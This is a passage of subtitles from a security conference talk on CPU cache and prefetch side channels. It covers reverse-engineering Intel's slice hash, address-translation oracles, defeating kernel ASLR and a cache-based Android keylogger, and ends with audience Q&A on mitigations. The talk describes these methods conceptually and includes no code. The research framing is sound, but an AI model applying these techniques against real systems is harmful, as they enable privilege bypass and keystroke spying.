00:30:27,960 --> 00:30:32,460
Now the thing is that this hash function
is undocumented by Intel. Wouldn't be fun

328
00:30:32,460 --> 00:30:39,250
otherwise. So we have this: As many slices
as core, an undocumented hash function

329
00:30:39,250 --> 00:30:43,980
that maps a physical address to a slice,
and while it's actually a bit of a pain

330
00:30:43,980 --> 00:30:48,710
for attacks, it has, it was not designed
for security originally but for

331
00:30:48,710 --> 00:30:53,570
performance, because you want all the
access to be evenly distributed in the

332
00:30:53,570 --> 00:31:00,399
different slices, for performance reasons.
So the hash function basically does, it

333
00:31:00,399 --> 00:31:05,279
takes some bits of the physical address
and output k bits of slice, so just one

334
00:31:05,279 --> 00:31:09,309
bits if you have a two-core machine, two
bits if you have a four-core machine and

335
00:31:09,309 --> 00:31:16,830
so on. Now let's go back to clflush, see
what's the relation with that.

336
00:31:16,830 --> 00:31:21,169
So the thing that we noticed is that
clflush is actually faster to reach a line

337
00:31:21,169 --> 00:31:28,549
on the local slice.
So if you have, if you're flushing always

338
00:31:28,549 --> 00:31:33,340
one line and you run your program on core
zero, core one, core two and core three,

339
00:31:33,340 --> 00:31:37,899
you will observe that one core in
particular on, when you run the program on

340
00:31:37,899 --> 00:31:44,632
one core, the clflush is faster. And so
here this is on core one, and you can see

341
00:31:44,632 --> 00:31:51,139
that core zero, two, and three it's, it's
a bit slower and here we can deduce that,

342
00:31:51,139 --> 00:31:55,320
so we run the program on core one and we
flush always the same line and we can

343
00:31:55,320 --> 00:32:01,850
deduce that the line belong to slice one.
And what we can do with that is that we

344
00:32:01,850 --> 00:32:06,500
can map physical address to slices.
And that's one way to reverse-engineer

345
00:32:06,500 --> 00:32:10,639
this addressing function that was not
documented.

346
00:32:10,639 --> 00:32:15,880
Funnily enough that's not the only way:
What I did before that was using the

347
00:32:15,880 --> 00:32:21,229
performance counters to reverse-engineer
this function, but that's actually a whole

348
00:32:21,229 --> 00:32:27,770
other story and if you want more detail on
that, there's also an article on that.

349
00:32:27,770 --> 00:32:30,139
ML: So the next instruction we want to

350
00:32:30,139 --> 00:32:35,110
talk about is the prefetch instruction.
And the prefetch instruction is used to

351
00:32:35,110 --> 00:32:40,841
tell the CPU: "Okay, please load the data
I need later on, into the cache, if you

352
00:32:40,841 --> 00:32:45,968
have some time." And in the end there are
actually six different prefetch

353
00:32:45,968 --> 00:32:52,929
instructions: prefetcht0 to t2 which
means: "CPU, please load the data into the

354
00:32:52,929 --> 00:32:58,640
first-level cache", or in the last-level
cache, whatever you want to use, but we

355
00:32:58,640 --> 00:33:02,250
spare you the details because it's not so
interesting in the end.

356
00:33:02,250 --> 00:33:06,940
However, what's more interesting is when
we take a look at the Intel manual and

357
00:33:06,940 --> 00:33:11,880
what it says there. So, "Using the
PREFETCH instruction is recommended only

358
00:33:11,880 --> 00:33:17,049
if data does not fit in the cache." So you
can tell the CPU: "Please load data I want

359
00:33:17,049 --> 00:33:23,210
to stream into the cache, so it's more
performant." "Use of software prefetch

360
00:33:23,210 --> 00:33:27,740
should be limited to memory addresses that
are managed or owned within the

361
00:33:27,740 --> 00:33:33,620
application context."
So one might wonder what happens if this

362
00:33:33,620 --> 00:33:40,940
address is not managed by myself. Sounds
interesting. "Prefetching to addresses

363
00:33:40,940 --> 00:33:46,289
that are not mapped to physical pages can
experience non-deterministic performance

364
00:33:46,289 --> 00:33:52,030
penalty. For example specifying a NULL
pointer as an address for prefetch can

365
00:33:52,030 --> 00:33:56,000
cause long delays."
So we don't want to do that because our

366
00:33:56,000 --> 00:34:02,919
program will be slow. So, let's take a
look what they mean with non-deterministic

367
00:34:02,919 --> 00:34:08,889
performance penalty, because we want to
write good software, right? But before

368
00:34:08,889 --> 00:34:12,510
that, we have to take a look at a little
bit more background information to

369
00:34:12,510 --> 00:34:17,710
understand the attacks.
So on modern operating systems, every

370
00:34:17,710 --> 00:34:22,850
application has its own virtual address
space. So at some point, the CPU needs to

371
00:34:22,850 --> 00:34:27,479
translate these addresses to the physical
addresses actually in the DRAM. And for

372
00:34:27,479 --> 00:34:33,690
that we have this very complex-looking
data structure. So we have a 48-bit

373
00:34:33,690 --> 00:34:40,409
virtual address, and some of those bits
mapped to a table, like the PM level 4

374
00:34:40,409 --> 00:34:47,760
table, with 512 entries, so depending on
those bits the CPU knows, at which line he

375
00:34:47,760 --> 00:34:51,520
has to look.
And if there is data there, because the

376
00:34:51,520 --> 00:34:56,900
address is mapped, he can proceed and look
at the page directory, point the table,

377
00:34:56,900 --> 00:35:04,620
and so on for the town. So is everything,
is the same for each level until you come

378
00:35:04,620 --> 00:35:09,130
to your page table, where you have
4-kilobyte pages. So it's in the end not

379
00:35:09,130 --> 00:35:13,851
that complicated, but it's a bit
confusing, because you want to know a

380
00:35:13,851 --> 00:35:20,310
physical address, so you have to look it
up somewhere in the, in the main memory

381
00:35:20,310 --> 00:35:25,420
with physical addresses to translate your
virtual addresses. And if you have to go

382
00:35:25,420 --> 00:35:31,890
through all those levels, it needs a long
time, so we can do better than that and

383
00:35:31,890 --> 00:35:39,160
that's why Intel introduced additional
caches, also for all of those levels. So,

384
00:35:39,160 --> 00:35:45,560
if you want to translate an address, you
take a look at the ITLB for instructions,

385
00:35:45,560 --> 00:35:51,150
and the data TLB for data. If it's there,
you can stop, otherwise you go down all

386
00:35:51,150 --> 00:35:58,700
those levels and if it's not in any cache
you have to look it up in the DRAM. In

387
00:35:58,700 --> 00:36:03,300
addition, the address space you have is
shared, because you have, on the one hand,

388
00:36:03,300 --> 00:36:07,470
the user memory and, on the other hand,
you have mapped the kernel for convenience

389
00:36:07,470 --> 00:36:12,870
and performance also in the address space.
And if your user program wants to access

390
00:36:12,870 --> 00:36:18,310
some kernel functionality like reading a
file, it will switch to the kernel memory

391
00:36:18,310 --> 00:36:23,880
there's a privilege escalation, and then
you can read the file, and so on. So,

392
00:36:23,880 --> 00:36:30,420
that's it. However, you have drivers in
the kernel, and if you know the addresses

393
00:36:30,420 --> 00:36:35,771
of those drivers, you can do code-reuse
attacks, and as a countermeasure, they

394
00:36:35,771 --> 00:36:40,150
introduced address-space layout
randomization, also for the kernel.

395
00:36:40,150 --> 00:36:47,040
And this means that when you have your
program running, the kernel is mapped at

396
00:36:47,040 --> 00:36:51,630
one address and if you reboot the machine
it's not on the same address anymore but

397
00:36:51,630 --> 00:36:58,390
somewhere else. So if there is a way to
find out at which address the kernel is

398
00:36:58,390 --> 00:37:04,450
loaded, you have circumvented this
countermeasure and defeated kernel address

399
00:37:04,450 --> 00:37:11,060
space layout randomization. So this would
be nice for some attacks. In addition,

400
00:37:11,060 --> 00:37:16,947
there's also the kernel direct physical
map. And what does this mean? It's

401
00:37:16,947 --> 00:37:23,320
implemented on many operating systems like
OS X, Linux, also on the Xen hypervisor

402
00:37:23,320 --> 00:37:27,860
and
BSD, but not on Windows. But what it means

403
00:37:27,860 --> 00:37:33,870
is that the complete physical memory is
mapped in additionally in the kernel

404
00:37:33,870 --> 00:37:40,460
memory at a fixed offset. So, for every
page that is mapped in the user space,

405
00:37:40,460 --> 00:37:45,160
there's something like a twin page in the
kernel memory, which you can't access

406
00:37:45,160 --> 00:37:50,371
because it's in the kernel memory.
However, we will need it later, because

407
00:37:50,371 --> 00:37:58,230
now we go back to prefetch and see what we
can do with that. So, prefetch is not a

408
00:37:58,230 --> 00:38:04,150
usual instruction, because it just tells
the CPU "I might need that data later on.

409
00:38:04,150 --> 00:38:10,000
If you have time, load for me," if not,
the CPU can ignore it because it's busy

410
00:38:10,000 --> 00:38:15,810
with other stuff. So, there's no necessity
that this instruction is really executed,

411
00:38:15,810 --> 00:38:22,070
but most of the time it is. And a nice,
interesting thing is that it generates no

412
00:38:22,070 --> 00:38:29,000
faults, so whatever you pass to this
instruction, your program won't crash, and

413
00:38:29,000 --> 00:38:33,990
it does not check any privileges, so I can
also pass an kernel address to it and it

414
00:38:33,990 --> 00:38:37,510
won't say "No, stop, you accessed an
address that you are not allowed to

415
00:38:37,510 --> 00:38:45,530
access, so I crash," it just continues,
which is nice.

416
00:38:45,530 --> 00:38:49,810
The second interesting thing is that the
operand is a virtual address, so every

417
00:38:49,810 --> 00:38:55,534
time you execute this instruction, the CPU
has to go and check "OK, what physical

418
00:38:55,534 --> 00:38:59,600
address does this virtual address
correspond to?" So it has to do the lookup

419
00:38:59,600 --> 00:39:05,750
with all those tables we've seen earlier,
and as you probably have guessed already,

420
00:39:05,750 --> 00:39:10,370
the execution time varies also for the
prefetch instruction and we will see later

421
00:39:10,370 --> 00:39:16,090
on what we can do with that.
So, let's get back to the direct physical

422
00:39:16,090 --> 00:39:22,870
map. Because we can create an oracle for
address translation, so we can find out

423
00:39:22,870 --> 00:39:27,540
what physical address belongs to the
virtual address. Because nowadays you

424
00:39:27,540 --> 00:39:31,990
don't want that the user to know, because
you can craft nice rowhammer attacks with

425
00:39:31,990 --> 00:39:37,520
that information, and more advanced cache
attacks, so you restrict this information

426
00:39:37,520 --> 00:39:44,270
to the user. But let's check if we find a
way to still get this information. So, as

427
00:39:44,270 --> 00:39:50,150
I've told you earlier, if you have a
paired page in the user space map,

428
00:39:50,150 --> 00:39:54,505
you have the twin page in the kernel 
space, and if it's cached,

429
00:39:54,505 --> 00:39:56,710
its cached for both of them again.

430
00:39:56,710 --> 00:40:03,170
So, the attack now works as the following:
From the attacker you flush your user

431
00:40:03,170 --> 00:40:09,760
space page, so it's not in the cache for
the... also for the kernel memory, and

432
00:40:09,760 --> 00:40:15,850
then you call prefetch on the address of
the kernel, because as I told you, you

433
00:40:15,850 --> 00:40:22,050
still can do that because it doesn't
create any faults. So, you tell the CPU

434
00:40:22,050 --> 00:40:28,310
"Please load me this data into the cache
even if I don't have access to this data

435
00:40:28,310 --> 00:40:32,550
normally."
And if we now measure on our user space

436
00:40:32,550 --> 00:40:37,100
page the address again, and we measure a
cache hit, because it has been loaded by

437
00:40:37,100 --> 00:40:42,630
the CPU into the cache, we know exactly at
which position, since we passed the

438
00:40:42,630 --> 00:40:48,250
address to the function, this address
corresponds to. And because this is at a

439
00:40:48,250 --> 00:40:53,280
fixed offset, we can just do a simple
subtraction and know the physical address

440
00:40:53,280 --> 00:40:59,180
again. So we have a nice way to find
physical addresses for virtual addresses.

441
00:40:59,180 --> 00:41:04,390
And in practice this looks like this
following plot. So, it's pretty simple,

442
00:41:04,390 --> 00:41:08,910
because we just do this for every address,
and at some point we measure a cache hit.

443
00:41:08,910 --> 00:41:14,260
So, there's a huge difference. And exactly
at this point we know this physical

444
00:41:14,260 --> 00:41:20,140
address corresponds to our virtual
address. The second thing is that we can

445
00:41:20,140 --> 00:41:27,070
exploit the timing differences it needs
for the prefetch instruction. Because, as

446
00:41:27,070 --> 00:41:31,850
I told you, when you go down this cache
levels, at some point you see "it's here"

447
00:41:31,850 --> 00:41:37,500
or "it's not here," so it can abort early.
And with that we can know exactly

448
00:41:37,500 --> 00:41:41,800
when the prefetch
instruction aborted, and know how the

449
00:41:41,800 --> 00:41:48,070
pages are mapped into the address space.
So, the timing depends on where the

450
00:41:48,070 --> 00:41:57,090
translation stops. And using those two
properties and those information, we can

451
00:41:57,090 --> 00:42:02,227
do the following: On the one hand, we can
build variants of cache attacks. So,

452
00:42:02,227 --> 00:42:07,444
instead of Flush+Reload, we can do
Flush+Prefetch, for instance. We can

453
00:42:07,444 --> 00:42:12,060
also use prefetch to mount rowhammer
attacks on privileged addresses, because

454
00:42:12,060 --> 00:42:18,069
it doesn't do any faults when we pass
those addresses, and it works as well. In

455
00:42:18,069 --> 00:42:23,330
addition, we can use it to recover the
translation levels of a process, which you

456
00:42:23,330 --> 00:42:27,870
could do earlier with the page map file,
but as I told you it's now privileged, so

457
00:42:27,870 --> 00:42:32,890
you don't have access to that, and by
doing that you can bypass address space

458
00:42:32,890 --> 00:42:38,170
layout randomization. In addition, as I
told you, you can translate virtual

459
00:42:38,170 --> 00:42:43,530
addresses to physical addresses, which is
now also privileged with the page map

460
00:42:43,530 --> 00:42:48,790
file, and using that it reenables return
to direct exploits, which have been

461
00:42:48,790 --> 00:42:55,550
demonstrated last year. On top of that, we
can also use this to locate kernel

462
00:42:55,550 --> 00:43:00,850
drivers, as I told you. It would be nice
if we can circumvent KSLR as well, and I

463
00:43:00,850 --> 00:43:08,380
will show you now how this is possible.
So, with the first oracle we find out all

464
00:43:08,380 --> 00:43:15,430
the pages that are mapped, and for each of
those pages, we evict the translation

465
00:43:15,430 --> 00:43:18,210
caches, and we can do that by either
calling sleep,

466
00:43:18,210 --> 00:43:24,450
which schedules another program, or access
just a large memory buffer. Then, we

467
00:43:24,450 --> 00:43:28,260
perform a syscall to the driver. So,
there's code of the driver executed and

468
00:43:28,260 --> 00:43:33,540
loaded into the cache, and then we just
measure the time prefetch takes on this

469
00:43:33,540 --> 00:43:40,840
address. And in the end, the fastest
average access time is the driver page.

470
00:43:40,840 --> 00:43:46,770
So, we can mount this attack on Windows 10
in less than 12 seconds. So, we can defeat

471
00:43:46,770 --> 00:43:52,110
KSLR in less than 12 seconds, which is
very nice. And in practice, the

472
00:43:52,110 --> 00:43:58,330
measurements looks like the following: So,
we have a lot of long measurements, and at

473
00:43:58,330 --> 00:44:05,060
some point you have a low one, and you
know exactly that this driver region and

474
00:44:05,060 --> 00:44:09,930
the address the driver is located. And
you can mount those read to direct

475
00:44:09,930 --> 00:44:16,210
attacks again. However, that's not
everything, because there are more

476
00:44:16,210 --> 00:44:20,795
instructions in Intel.
CM: Yeah, so, the following is not our

477
00:44:20,795 --> 00:44:24,350
work, but we thought that would be
interesting, because it's basically more

478
00:44:24,350 --> 00:44:30,740
instructions, more attacks, more fun. So
there's the RDSEED instruction, and what

479
00:44:30,740 --> 00:44:35,340
it does, that is request a random seed to
the hardware random number generator. So,

480
00:44:35,340 --> 00:44:39,310
the thing is that there is a fixed number
of precomputed random bits, and that takes

481
00:44:39,310 --> 00:44:44,320
time to regenerate them. So, as everything
that takes time, you can create a covert

482
00:44:44,320 --> 00:44:50,180
channel with that. There is also FADD and
FMUL, which are floating point operations.

483
00:44:50,180 --> 00:44:56,740
Here, the running time of this instruction
depends on the operands. Some people

484
00:44:56,740 --> 00:45:01,530
managed to bypass Firefox's same origin
policy with an SVG filter timing attack

485
00:45:01,530 --> 00:45:08,540
with that. There's also the JMP
instructions. So, in modern CPUs you have

486
00:45:08,540 --> 00:45:14,520
branch prediction, and branch target
prediction. With that, it's actually been

487
00:45:14,520 --> 00:45:18,250
studied a lot, you can create a covert
channel. You can do side-channel attacks

488
00:45:18,250 --> 00:45:26,028
on crypto. You can also bypass KSLR, and
finally, there are TSX instructions, which

489
00:45:26,028 --> 00:45:31,010
is an extension for hardware transactional
memory support, which has also been used

490
00:45:31,010 --> 00:45:37,150
to bypass KSLR. So, in case you're not
sure, KSLR is dead. You have lots of

491
00:45:37,150 --> 00:45:45,650
different things to read. Okay, so, on the
conclusion now. So, as you've seen, it's

492
00:45:45,650 --> 00:45:50,190
actually more a problem of CPU design,
than really the instruction sets

493
00:45:50,190 --> 00:45:55,720
architecture. The thing is that all these
issues are really hard to patch. They

494
00:45:55,720 --> 00:45:59,966
are all linked to performance
optimizations, and we are not getting rid

495
00:45:59,966 --> 00:46:03,890
of performance optimization. That's
basically a trade-off between performance

496
00:46:03,890 --> 00:46:11,530
and security, and performance seems to
always win. There has been some

497
00:46:11,530 --> 00:46:20,922
propositions to... against cache attacks,
to... let's say remove the CLFLUSH

498
00:46:20,922 --> 00:46:26,640
instructions. The thing is that all these
quick fix won't work, because we always

499
00:46:26,640 --> 00:46:31,450
find new ways to do the same thing without
these precise instructions and also, we

500
00:46:31,450 --> 00:46:37,410
keep finding new instruction that leak
information. So, it's really, let's say

501
00:46:37,410 --> 00:46:43,740
quite a big topic that we have to fix
this. So, thank you very much for your

502
00:46:43,740 --> 00:46:47,046
attention. If you have any questions we'd
be happy to answer them.

503
00:46:47,046 --> 00:46:52,728
<i>applause</i>

504
00:46:52,728 --> 00:47:01,510
<i>applause</i>
Herald: Okay. Thank you very much again

505
00:47:01,510 --> 00:47:06,571
for your talk, and now we will have a Q&A,
and we have, I think, about 15 minutes, so

506
00:47:06,571 --> 00:47:11,330
you can start lining up behind the
microphones. They are in the gangways in

507
00:47:11,330 --> 00:47:18,130
the middle. Except, I think that one...
oh, no, it's back up, so it will work. And

508
00:47:18,130 --> 00:47:22,180
while we wait, I think we will take
questions from our signal angel, if there

509
00:47:22,180 --> 00:47:28,810
are any. Okay, there aren't any, so...
microphone questions. I think, you in

510
00:47:28,810 --> 00:47:33,440
front.
Microphone: Hi. Can you hear me?

511
00:47:33,440 --> 00:47:40,050
Herald: Try again.
Microphone: Okay. Can you hear me now?

512
00:47:40,050 --> 00:47:46,480
Okay. Yeah, I'd like to know what exactly
was your stealthiness metric? Was it that

513
00:47:46,480 --> 00:47:51,310
you can't distinguish it from a normal
process, or...?

514
00:47:51,310 --> 00:47:56,500
CM: So...
Herald: Wait a second. We have still Q&A,

515
00:47:56,500 --> 00:47:59,780
so could you quiet down a bit? That would
be nice.

516
00:47:59,780 --> 00:48:08,180
CM: So, the question was about the
stealthiness metric. Basically, we use the

517
00:48:08,180 --> 00:48:14,320
metric with cache misses and cache
references, normalized by the instructions

518
00:48:14,320 --> 00:48:21,080
TLB events, and we
just found the threshold under which

519
00:48:21,080 --> 00:48:25,820
pretty much every benign application was
below this, and rowhammer and cache

520
00:48:25,820 --> 00:48:30,520
attacks were after that. So we fixed the
threshold, basically.

521
00:48:30,520 --> 00:48:35,520
H: That microphone.
Microphone: Hello. Thanks for your talk.

522
00:48:35,520 --> 00:48:42,760
It was great. First question: Did you
inform Intel before doing this talk?

523
00:48:42,760 --> 00:48:47,520
CM: Nope.
Microphone: Okay. The second question:

524
00:48:47,520 --> 00:48:51,050
What's your future plans?
CM: Sorry?

525
00:48:51,050 --> 00:48:55,780
M: What's your future plans?
CM: Ah, future plans. Well, what I did,

526
00:48:55,780 --> 00:49:01,220
that is interesting, is that we keep
finding these more or less by accident, or

527
00:49:01,220 --> 00:49:06,440
manually, so having a good idea of what's
the attack surface here would be a good

528
00:49:06,440 --> 00:49:10,050
thing, and doing that automatically would
be even better.

529
00:49:10,050 --> 00:49:14,170
M: Great, thanks.
H: Okay, the microphone in the back,

530
00:49:14,170 --> 00:49:18,770
over there. The guy in white.
M: Hi. One question. If you have,

531
00:49:18,770 --> 00:49:24,410
like, a demon, that randomly invalidates
some cache lines, would that be a better

532
00:49:24,410 --> 00:49:31,120
countermeasure than disabling the caches?
ML: What was the question?

533
00:49:31,120 --> 00:49:39,580
CM: If invalidating cache lines would be
better than disabling the whole cache. So,

534
00:49:39,580 --> 00:49:42,680
I'm...
ML: If you know which cache lines have

535
00:49:42,680 --> 00:49:47,300
been accessed by the process, you can
invalidate those cache lines before you

536
00:49:47,300 --> 00:49:52,820
swap those processes, but it's also a
trade-off between performance. Like, you

537
00:49:52,820 --> 00:49:57,940
can also, if you switch processes, flush
the whole cache, and then it's empty, and

538
00:49:57,940 --> 00:50:01,900
then you don't see any activity anymore,
but there's also the trade-off of

539
00:50:01,900 --> 00:50:07,510
performance with this.
M: Okay, maybe a second question. If you,

540
00:50:07,510 --> 00:50:12,240
there are some ARM architectures
that have random cache line invalidations.

541
00:50:12,240 --> 00:50:16,010
Did you try those, if you can see a
[unintelligible] channel there.

542
00:50:16,010 --> 00:50:21,960
ML: If they're truly random, but probably
you just have to make more measurements

543
00:50:21,960 --> 00:50:27,180
and more measurements, and then you can
average out the noise, and then you can do

544
00:50:27,180 --> 00:50:30,350
these attacks again. It's like, with prime
and probe, where you need more

545
00:50:30,350 --> 00:50:34,080
measurements, because it's much more
noisy, so in the end you will just need

546
00:50:34,080 --> 00:50:37,870
much more measurements.
CM: So, on ARM, it's supposed to be pretty

547
00:50:37,870 --> 00:50:43,260
random. At least it's in the manual, but
we actually found nice ways to evict cache

548
00:50:43,260 --> 00:50:47,230
lines, that we really wanted to evict, so
it's not actually that pseudo-random.

549
00:50:47,230 --> 00:50:51,960
So, even... let's say, if something is
truly random, it might be nice, but then

550
00:50:51,960 --> 00:50:57,170
it's also quite complicated to implement.
I mean, you probably don't want a random

551
00:50:57,170 --> 00:51:01,480
number generator just for the cache.
M: Okay. Thanks.

552
00:51:01,480 --> 00:51:05,980
H: Okay, and then the three guys here on
the microphone in the front.

553
00:51:05,980 --> 00:51:13,450
M: My question is about a detail with the
keylogger. You could distinguish between

554
00:51:13,450 --> 00:51:18,150
space, backspace and alphabet, which is
quite interesting. But could you also

555
00:51:18,150 --> 00:51:22,320
figure out the specific keys that were
pressed, and if so, how?

556
00:51:22,320 --> 00:51:25,650
ML: Yeah, that depends on the
implementation of the keyboard. But what

557
00:51:25,650 --> 00:51:29,310
we did, we used the Android stock
keyboard, which is shipped with the

558
00:51:29,310 --> 00:51:34,520
Samsung, so it's pre-installed. And if you
have a table somewhere in your code, which

559
00:51:34,520 --> 00:51:39,540
says "Okay, if you press this exact
location or this image, it's an A or it's

560
00:51:39,540 --> 00:51:44,450
an B", then you can also do a more
sophisticated attack. So, if you find any

561
00:51:44,450 --> 00:51:49,050
functions or data in the code, which
directly tells you "Okay, this is this

562
00:51:49,050 --> 00:51:54,520
character," you can also spy on the actual
key characters on the keyboard.

563
00:51:54,520 --> 00:52:02,900
M: Thank you.
M: Hi. Thank you for your talk. My first

564
00:52:02,900 --> 00:52:08,570
question is: What can we actually do now,
to mitigate this kind of attack? By, for

565
00:52:08,570 --> 00:52:11,980
example switching off TSX or using ECC
RAM.

566
00:52:11,980 --> 00:52:17,410
CM: So, I think the very important thing
to protect would be, like crypto, and the

567
00:52:17,410 --> 00:52:20,840
good thing is that today we know how to
build crypto that is resistant to side-

568
00:52:20,840 --> 00:52:24,490
channel attacks. So the good thing would
be to stop improving implementation that

569
00:52:24,490 --> 00:52:31,360
are known to be vulnerable for 10 years.
Then things like keystrokes is way harder

570
00:52:31,360 --> 00:52:36,830
to protect, so let's say crypto is
manageable; the whole system is clearly

571
00:52:36,830 --> 00:52:41,490
another problem. And you can have
different types of countermeasure on the

572
00:52:41,490 --> 00:52:45,780
hardware side but it does would mean that
Intel an ARM actually want to fix that,

573
00:52:45,780 --> 00:52:48,560
and that they know how to fix that. I
don't even know how to fix that in

574
00:52:48,560 --> 00:52:55,500
hardware. Then on the system side, if you
prevent some kind of memory sharing, you

575
00:52:55,500 --> 00:52:58,540
don't have flush involved anymore
and primum (?) probably is much more

576
00:52:58,540 --> 00:53:04,880
noisier, so it would be an improvement.
M: Thank you.

577
00:53:04,880 --> 00:53:11,880
H: Do we have signal angel questions? No.
OK, then more microphone.

578
00:53:11,880 --> 00:53:16,630
M: Hi, thank you. I wanted to ask about
the way you establish the side-channel

579
00:53:16,630 --> 00:53:23,280
between the two processors, because it
would obviously have to be timed in a way to

580
00:53:23,280 --> 00:53:28,511
transmit information between one process
to the other. Is there anywhere that you

581
00:53:28,511 --> 00:53:32,970
documented the whole? You know, it's
actually almost like the seven layers or

582
00:53:32,970 --> 00:53:36,580
something like that. There are any ways
that you documented that? It would be

583
00:53:36,580 --> 00:53:40,260
really interesting to know how it worked.
ML: You can find this information in the

584
00:53:40,260 --> 00:53:46,120
paper because there are several papers on
covered channels using that, so the NDSS

585
00:53:46,120 --> 00:53:51,300
paper is published in February I guess,
but the Armageddon paper also includes

586
00:53:51,300 --> 00:53:55,670
a cover channel, and you can
find more information about how the

587
00:53:55,670 --> 00:53:59,320
packets look like and how the
synchronization works in the paper.

588
00:53:59,320 --> 00:54:04,020
M: Thank you.
H: One last question?

589
00:54:04,020 --> 00:54:09,750
M: Hi! You mentioned that you used Osvik's
attack for the AES side-channel attack.

590
00:54:09,750 --> 00:54:17,350
Did you solve the AES round detection and
is it different to some scheduler

591
00:54:17,350 --> 00:54:21,441
manipulation?
CM: So on this one I think we only did

592
00:54:21,441 --> 00:54:24,280
some synchronous attack, so we already
knew when

593
00:54:24,280 --> 00:54:27,770
the victim is going to be scheduled and
we didn't have anything to do with

594
00:54:27,770 --> 00:54:32,930
schedulers.
M: Alright, thank you.

595
00:54:32,930 --> 00:54:37,140
H: Are there any more questions? No, I
don't see anyone. Then, thank you very

596
00:54:37,140 --> 00:54:39,132
much again to our speakers.

597
00:54:39,132 --> 00:54:42,162
<i>applause</i>

598
00:54:42,162 --> 00:54:58,970
<i>music</i>

599
00:54:58,970 --> 00:55:06,000
subtitles created by c3subtitles.de
in the year 2020. Join, and help us!